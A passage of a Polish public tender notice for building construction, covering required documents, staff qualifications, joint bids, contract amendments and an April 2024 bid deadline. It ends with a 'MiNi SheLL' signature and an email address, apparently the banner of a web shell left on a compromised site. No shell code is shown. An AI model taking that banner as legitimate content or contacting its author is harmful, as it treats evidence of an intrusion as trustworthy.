odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>b) zaświadczenie albo inny dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art.109 ust.1 pkt 1 ustawy, wystawionego nie wcześniej niż 3miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek<br/>na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>c) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.1 pkt4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>d) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Prawo zamówień publicznych (złożonym z ofertą), w zakresie podstaw wykluczenia z postępowania wskazanych w art. 108 ust. 1 oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach innych podmiotów na zasadach określonych w art. 118 ustawy,<br/>przedstawienia do tych podmiotów dokumentów wymienionych w pkt. 6.1 SWZ w celu wykazania braku podstaw wykluczenia.<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej - szczegółowo pkt 6.1 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, co najmniej: 2 zamówienia rodzajem odpowiadające niniejszemu<br/>postępowaniu tj. wykonanie robót budowlanych polegających na budowie obiektu kubaturowego, o kubaturze brutto nie mniejszej niż<br/>200 m3 każda budowa.<br/>oraz załączenia dowodów, że zostały wykonane należycie.<br/>Wykaz kontraktów winien uwzględnić zakres wykonanych zamówień (ich przedmiot i kubaturę) z dokładną nazwą i adresem<br/>zleceniodawcy, datą wykonania – będący podstawą potwierdzenia spełnienia warunku określonego w pkt. 5.2.1 w SWZ.<br/>Dowodami, że roboty zostały wykonane należycie są :<br/>- referencje i inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami,<br/>wykaz dotyczy robót, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji<br/>zawodowych i doświadczenia niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania<br/>tymi osobami – wykaz powinien zawierać imię i nazwisko, kwalifikacje, opis doświadczenia oraz informację o podstawie do<br/>dysponowania - będący podstawą potwierdzenia spełnienia warunku określonego w pkt. 5.2.2 SWZ.<br/>Wykonawca winien dysponować kluczowymi dla wykonania zamówienia specjalistami, przez których Zamawiający rozumie na<br/>gruncie art. 14 ustawy z 7 lipca 1994 Prawo budowlane (tj Dz. U. z 2023 poz. 682) jedną osobę z:<br/>- uprawnieniami budowlanymi do kierowania bez ograniczeń robotami budowlanymi w specjalności konstrukcyjno-budowlanej, z<br/>minimum 3- letnim doświadczeniem zawodowym w kierowaniu robotami budowlanymi w zakresie swojej specjalności,<br/>- uprawnieniami budowlanymi do kierowania bez ograniczeń robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych, z minimum 3- letnim doświadczeniem zawodowym w kierowaniu<br/>robotami budowlanymi w zakresie swojej specjalności,<br/>- uprawnieniami budowlanymi do kierowania bez ograniczeń robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, z minimum 2- letnim doświadczeniem<br/>zawodowym w kierowaniu robotami budowlanymi w zakresie swojej specjalności.<br/>W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów w formie elektronicznej pod określonymi<br/>adresami internetowymi ogólnodostępnych baz danych Zamawiający samodzielnie pobierze z tych baz danych wskazane przez<br/>Wykonawcę oświadczenia lub dokumenty. W przypadku wskazania przez Wykonawcę oświadczeń i dokumentów, które znajdują się<br/>w posiadaniu Zamawiającego, Zamawiający korzysta z posiadanych dokumentów i oświadczeń o ile są aktualne.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda wraz z ofertą przedmiotowych środków dowodowych w celu potwierdzenia, że oferowane roboty<br/>budowlane spełniają wszystkie wymagania określone przez Zamawiającego:<br/>- 3 szczegółowe kosztorysy ofertowe (odpowiadające 3 branżom), sporządzone na podstawie przedmiarów (plik pdf<br/>opatrzony kwalifikowanym/zaufanym/osobistym podpisem elektronicznym przez upoważnionego przedstawiciela wykonawcy) - nie podlegają uzupełnieniu – stanowią element oferty. Zamawiający nie dopuszcza złożenia kosztorysów uproszczonych.<br/>Oferty bez załączonych szczegółowych kosztorysów podlegają odrzuceniu.<br/>Cena oferty musi być zgodna z sumą wyliczeń z 3 szczegółowych kosztorysów ofertowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/>a) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w niniejszym postępowaniu – art. 125 ust. 1<br/>ustawy i art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (wzór w załączeniu , wyjaśnienia<br/>poniżej pod SWZ*),<br/>b) zobowiązanie podmiotu/ów udostępniającego zasoby i oświadczenie podmiotu/ów (na zasoby, których powołuje się<br/>wykonawca przy spełnianiu warunków udziału w postępowaniu) o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w niniejszym postępowaniu w zakresie w jakim udostępnia zasoby – art. 125 ust. 1 ustawy i art. 7 ust. 1 ustawy z dnia 13<br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego (wzór w załączeniu , wyjaśnienia poniżej pod SWZ*),<br/>c) pełnomocnictwo osób uprawnionych do reprezentowania Wykonawcy, o ile są to inne osoby niż wymienione w<br/>dokumentach rejestrowych (KRS, CEIDG), PEŁNOMOCNICTWO ORYGINAŁ w formie elektronicznej (elektroniczny podpis<br/>kwalifikowany), lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym mocodawcy<br/>lub ELEKTRONICZNA KOPIA DOKUMENTU (skan dokumentu sporządzonego w formie pisemnej) poświadczona przez<br/>notariusza kwalifikowanym podpisem elektronicznym lub poświadczona przez mocodawcę elektronicznym podpisem<br/>kwalifikowany lub podpisem zaufanym lub podpisem osobistym.<br/>d) w przypadku gdy wykonawcy będą występowali z ofertą wspólną - przedsiębiorcy zobowiązani są przedłożyć wraz z<br/>ofertą umocowanie dla pełnomocnika oraz oświadczenie przewidujące sposób ich współdziałania, zakres prac<br/>przewidzianych do wykonania przez każdego z nich oraz sposób odpowiedzialności i spełnić wszystkie wymogi określone w<br/>pkt. 6.5. Każdy z wykonawców składa oświadczenie w zakresie braku podstaw do wykluczenia z udziału w postępowaniu z<br/>pkt. a,<br/>e) przedmiotowe środki dowodowe: 3 szczegółowe kosztorysy ofertowe (wymogi określone w pkt. 6.3 - przedmiotowy<br/>środek dowodowy nie podlega uzupełnieniu). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Dopuszcza się możliwość składania jednej oferty przez dwa lub więcej podmioty pod warunkiem, że taka oferta spełniać<br/>będzie następujące wymagania:<br/>1. przedsiębiorcy przedłożą wraz z ofertą oświadczenie, z którego wynika, które roboty wykonają poszczególni<br/>współwykonawcy – art. 117 ust. 4 ustawy Pzp.<br/>2. oferta musi być sporządzona taki sposób, by prawnie zobowiązywała wszystkich przedsiębiorców występujących<br/>wspólnie,<br/>3. przedsiębiorcy występujący wspólnie muszą upoważnić jednego spośród siebie jako przedstawiciela pozostałych<br/>(wyznaczyć lidera) do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, a<br/>jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli<br/>wszystkich pozostałych przedsiębiorców,<br/>4. wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako reprezentant<br/>pozostałych (lider),<br/>5. oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w punktach: 10.14.a i c dla każdego<br/>partnera z osobna, pozostałe zaś składane są wspólnie.<br/>6. ocena spełnienia warunków wymaganych od Wykonawców występujących z ofertą wspólną zostanie dokonana na<br/>podstawie oświadczenia wykonawcy/ów o treści jak w zał. 1a do oferty z zastrzeżeniem, iż warunek zapisany w:<br/>- pkt. 5.1 w SWZ winien być spełniony przez każdego wykonawcę,<br/>- pkt. 5.2.1 w SWZ winien być spełniony w całości co najmniej przez jednego z Wykonawców,<br/>- pkt. 5.2.2 w SWZ może być spełniony łącznie przez wykonawców.<br/>7. jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana – Zamawiający zażąda<br/>przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców.<br/>Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1 Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie w formie pisemnej z uwzględnieniem postanowień<br/>wynikających z treści niniejszej SWZ oraz danych zawartych w ofercie.<br/>2 Formularz postanowień umowy stanowi załącznik nr 3 do niniejszej Specyfikacji Warunków Zamówienia.<br/>3 Zamawiający, oprócz przypadków przewidzianych w ustawie Prawo zamówień publicznych, przewiduje możliwość zmiany<br/>umowy za zgodą stron w formie aneksu, w zakresie:<br/>3.1 zmiana osób wyznaczonych do pełnienia funkcji, jak też powołania nowych, z zachowaniem wymogów określonych w<br/>SWZ, zmiana będzie możliwa na uzasadniony wniosek Wykonawcy po zaakceptowaniu przez Zamawiającego,<br/>3.2 zmiana terminu realizacji umowy w następujących sytuacjach:<br/>a) w przypadku wystąpienia robót zamiennych lub dodatkowych wprowadzonych na podstawie zaakceptowanego przez<br/>Zamawiającego protokołu konieczności,<br/>b) w przypadku wprowadzenia w trakcie realizacji zamiennych rozwiązań projektowych zaakceptowanych przez<br/>Zamawiającego,<br/>c) wydłużenie terminu realizacji jeżeli opóźnienie jest spowodowane przez Zamawiającego, siłę wyższą lub inne obiektywne<br/>czynniki, przesłanki niezależne od Wykonawcy,<br/>d) jeżeli zmiany będą następstwem działania organów sądowych, właściwych organów administracji z przyczyn<br/>niezawinionych przez Wykonawcę,<br/>e) w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na<br/>realizację przedmiotu umowy,<br/>f) jeżeli zmiana terminu realizacji umowy jest konieczna z powodu działania siły wyższej, tj. niezwykłych i nieprzewidzianych<br/>okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej<br/>staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego.<br/>3.3 zmiany w stosunku do dokumentacji projektowej:<br/>a) na wniosek Wykonawcy, w trakcie prowadzenia robót, mogą być dokonywane zmiany technologii wykonania elementów<br/>robót. Dopuszcza się je tylko w przypadkach, gdy proponowane przez niego rozwiązanie jest równorzędne lub lepsze<br/>funkcjonalnie od tego, jakie przewiduje projekt, a jednocześnie nie spowoduje zwiększenia kosztów robót. W tym przypadku<br/>Wykonawca przedstawia projekt zamienny, zawierający opis proponowanych zmian, niezbędne rysunki i wycenę kosztów.<br/>Projekt taki wymaga akceptacji nadzoru autorskiego i zatwierdzenia do realizacji przez Zamawiającego,<br/>b) na wniosek Zamawiającego, w trakcie prowadzenia robót, mogą być dokonywane zmiany technologii i sposobu<br/>wykonania elementów robót, jeżeli z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań zawartych w<br/>dokumentacji projektowej. Dopuszcza się je tylko w przypadkach, gdy proponowane rozwiązanie nie spowoduje zwiększenia kosztów robót. W tym przypadku Zamawiający sporządza protokół konieczności, a następnie dostarcza<br/>Wykonawcy do akceptacji.<br/>3.4 zmiana kwoty wynagrodzenia Wykonawcy - zwiększenie wynagrodzenia lub obniżenie wynagrodzenia w przypadku<br/>wystąpienia robót zamiennych, dodatkowych, zaniechanych - wprowadzonych na podstawie zaakceptowanego przez<br/>Zamawiającego protokołu konieczności,<br/>3.5 wydłużenia terminu płatności wynagrodzenia na rzecz Wykonawcy, jeżeli wystąpią uzasadnione wątpliwości co do<br/>właściwego wykonania przedmiotu umowy,<br/>4 Warunki zmian:<br/>4.1 inicjowanie zmian – na wniosek Wykonawcy lub Zamawiającego,<br/>4.2 uzasadnienie zmian – prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych<br/>parametrów technicznych i jakościowych robót,<br/>4.3 forma zmian – aneks do umowy w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-19 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-19 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 29 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający nie przewiduje możliwości ograniczenia liczby wykonawców zapraszanych do negocjacji spośród ofert<br/>niepodlegających odrzuceniu <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przed podpisaniem umowy:<br/>1. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – Wykonawcy zobowiązani są dostarczyć<br/>kopię umowy regulującą współpracę tych Wykonawców. Wykonawcy występujący wspólnie ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy.<br/>2. w przypadku wykonawcy będącego spółką cywilną – Wykonawcy zobowiązani są dostarczyć aktualną kopię umowę<br/>spółki.<br/>3. przypadku, gdy wartość przedmiotu niniejszego zamówienia przekroczy dwukrotność kapitału zakładowego Wykonawcy<br/>posiadającego status spółki z ograniczoną odpowiedzialnością, Wykonawca zobowiązany jest przedłożyć kopię uchwały<br/>zgromadzenia wspólników upoważniającą zarząd spółki do zawarcia umowy o udzielenie zamówienia publicznego (art. 230<br/>ustawy z dnia 15.09.2000 r. Kodeks spółek handlowych t.j. Dz. U. z 2022 poz. 1467).<br/>4. Wykonawca zobowiązany jest dostarczyć kopię aktualnej polisy OC w zakresie prowadzonej działalności gospodarczej na<br/>sumę nie mniejszą niż 500 000 ,00 zł ( słownie pięćset tysięcy 00/100 złotych ) WRAZ z oświadczeniem, że ww. suma<br/>ubezpieczenia nie została wyczerpana i kopię polisy NNW.<br/>5. Wykonawca zobowiązany jest dostarczyć kopie dokumentów potwierdzających uprawnienia, kwalifikacje zawodowe i<br/>czynną przynależność do izby samorządu zawodowego osób wymienionych w wykazie oraz kosztorysy szczegółowe<br/>edytowalne zgodne z kosztorysami złożonymi do oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com